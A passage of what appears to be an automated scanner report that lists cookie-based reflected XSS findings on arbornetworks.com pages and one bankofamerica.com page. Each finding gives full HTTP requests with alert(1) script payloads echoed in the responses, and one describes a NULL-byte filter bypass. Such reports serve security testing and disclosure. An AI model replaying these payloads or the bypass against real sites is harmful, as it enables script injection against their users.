Set-Cookie: mbfcookie[lang]=jp; expires=Thu, 03-Feb-2011 23:58:37 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:58:37 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="en8184b\"><script>alert(1)</script>1699682b65d">
...[SNIP]...

3.167. http://www.arbornetworks.com/jp/infrastructure-security-report.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /jp/infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4a5f"><script>alert(1)</script>be89fa02b90 was submitted in the mbfcookie[lang] cookie. This input was echoed as e4a5f\"><script>alert(1)</script>be89fa02b90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /jp/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene4a5f"><script>alert(1)</script>be89fa02b90; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:05:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=f2a9fb3cbd3eca6e85ad4f71016475b1; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:05:14 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:05:14 GMT; path=/
Set-Cookie: mbfcookie[lang]=jp; expires=Fri, 04-Feb-2011 00:05:15 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:05:18 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="ene4a5f\"><script>alert(1)</script>be89fa02b90">
...[SNIP]...

3.168. http://www.arbornetworks.com/kr/2.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /kr/2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad6f9"><script>alert(1)</script>0bc779789b was submitted in the mbfcookie[lang] cookie. This input was echoed as ad6f9\"><script>alert(1)</script>0bc779789b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /kr/2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enad6f9"><script>alert(1)</script>0bc779789b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:01:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=0a6b97f628d39a90dee2831d97a64c92; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:01:55 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:01:55 GMT; path=/
Set-Cookie: mbfcookie[lang]=kr; expires=Fri, 04-Feb-2011 00:01:56 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:01:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="enad6f9\"><script>alert(1)</script>0bc779789b">
...[SNIP]...

3.169. http://www.arbornetworks.com/kr/network-infrastructure-security-report.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /kr/network-infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e2d6"><script>alert(1)</script>e91882c8043 was submitted in the mbfcookie[lang] cookie. This input was echoed as 4e2d6\"><script>alert(1)</script>e91882c8043 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /kr/network-infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4e2d6"><script>alert(1)</script>e91882c8043; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:05:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=fe71f0ac4b9241c4bc66dbfa4b51bc91; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:05:42 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:05:42 GMT; path=/
Set-Cookie: mbfcookie[lang]=kr; expires=Fri, 04-Feb-2011 00:05:43 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:05:46 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en4e2d6\"><script>alert(1)</script>e91882c8043">
...[SNIP]...

3.170. http://www.arbornetworks.com/privacy_policy.php [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /privacy_policy.php

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac374"><script>alert(1)</script>5a50e0c21ab was submitted in the mbfcookie[lang] cookie. This input was echoed as ac374\"><script>alert(1)</script>5a50e0c21ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /privacy_policy.php HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enac374"><script>alert(1)</script>5a50e0c21ab; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:56:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=cc0c770c26d7972f4e5fa31c38568bac; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:56:43 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:56:43 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:56:44 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:56:44 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="enac374\"><script>alert(1)</script>5a50e0c21ab">
...[SNIP]...

3.171. https://www.arbornetworks.com/ [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9071"><script>alert(1)</script>e4e30e085f was submitted in the mbfcookie[lang] cookie. This input was echoed as a9071\"><script>alert(1)</script>e4e30e085f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ena9071"><script>alert(1)</script>e4e30e085f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:04:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=e76d99c551293ab7d0c23ee0ecdb6485; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:04:18 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:04:18 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:04:19 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:04:20 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="ena9071\"><script>alert(1)</script>e4e30e085f">
...[SNIP]...

3.172. https://www.arbornetworks.com/en/lost-password-3.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /en/lost-password-3.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54038"><script>alert(1)</script>1e95dab8e0e was submitted in the mbfcookie[lang] cookie. This input was echoed as 54038\"><script>alert(1)</script>1e95dab8e0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/lost-password-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en54038"><script>alert(1)</script>1e95dab8e0e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:04:40 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=9eea038b074e30087eeedae6e935ba9a; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:04:40 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:04:40 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:04:41 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:04:41 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en54038\"><script>alert(1)</script>1e95dab8e0e">
...[SNIP]...

3.173. https://www.arbornetworks.com/en/partner-portal-home.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /en/partner-portal-home.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deb1d"><script>alert(1)</script>cfcda14f30a was submitted in the mbfcookie[lang] cookie. This input was echoed as deb1d\"><script>alert(1)</script>cfcda14f30a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/partner-portal-home.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=endeb1d"><script>alert(1)</script>cfcda14f30a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response (redirected)

HTTP/1.0 404 NOT FOUND
Date: Thu, 03 Feb 2011 00:04:54 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=f1fe583671ff7bddd5f555081913ea24; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:04:54 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:04:54 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:04:55 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:04:56 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="endeb1d\"><script>alert(1)</script>cfcda14f30a">
...[SNIP]...

3.174. https://www.arbornetworks.com/index.php [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /index.php

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8239"><script>alert(1)</script>31f3540dcc0 was submitted in the mbfcookie[lang] cookie. This input was echoed as d8239\"><script>alert(1)</script>31f3540dcc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.php HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=end8239"><script>alert(1)</script>31f3540dcc0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:03:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=410866f9e5772176ae7e03196c5efdab; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:03:25 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:03:25 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:03:26 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:03:27 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="end8239\"><script>alert(1)</script>31f3540dcc0">
...[SNIP]...

3.175. https://www.arbornetworks.com/index.php [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /index.php

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b457f"><script>alert(1)</script>667bdae159f was submitted in the mbfcookie[lang] cookie. This input was echoed as b457f\"><script>alert(1)</script>667bdae159f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /index.php?option=com_content&task=view&id=296&Itemid=297 HTTP/1.1
Host: www.arbornetworks.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; mbfcookie[lang]=enb457f"><script>alert(1)</script>667bdae159f; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; __utmc=186398841; __utmb=186398841.2.10.1296689848

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:47:30 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=-; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:47:29 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:47:29 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:47:30 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:47:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4889
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: PartnerLogi
...[SNIP]...
<meta lang="enb457f\"><script>alert(1)</script>667bdae159f">
...[SNIP]...

3.176. https://www.arbornetworks.com/register.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /register.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bddb"><script>alert(1)</script>119487711af was submitted in the mbfcookie[lang] cookie. This input was echoed as 1bddb\"><script>alert(1)</script>119487711af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /register.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en1bddb"><script>alert(1)</script>119487711af; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:06:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=789c30ca4dc20e92c36bbaf88590c360; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:06:21 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:06:21 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:06:22 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:06:23 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: PartnerLogi
...[SNIP]...
<meta lang="en1bddb\"><script>alert(1)</script>119487711af">
...[SNIP]...

3.177. https://www.bankofamerica.com/privacy/Control.do [BOA_0020 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy/Control.do

Issue detail

The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0853'%3balert(1)//b444241d7da was submitted in the BOA_0020 cookie. This input was echoed as b0853';alert(1)//b444241d7da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

